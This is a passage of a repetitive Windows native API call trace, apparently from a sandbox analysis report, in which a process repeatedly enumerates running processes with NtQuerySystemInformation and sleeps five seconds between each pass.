BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.853] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.859] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.862] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.862] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.869] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.870] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.872] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.873] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.873] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.879] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.881] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.881] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.882] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.887] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.889] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.889] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.895] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.897] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.897] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.897] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.902] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.909] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.910] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.911] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.911] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.912] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.912] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.915] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.916] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.919] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.923] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.925] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.925] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.926] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.926] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.930] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.930] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.933] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.933] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.938] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.944] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.945] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.946] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.946] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.947] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.947] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.947] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.952] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.953] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.959] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.960] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.966] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.966] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.969] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.970] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.977] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0210.986] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0210.987] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0210.989] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0210.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0210.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0210.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0210.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.015] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.016] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.023] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.026] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.030] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.030] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0211.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0211.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0211.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0211.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0211.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0211.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0211.047] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, 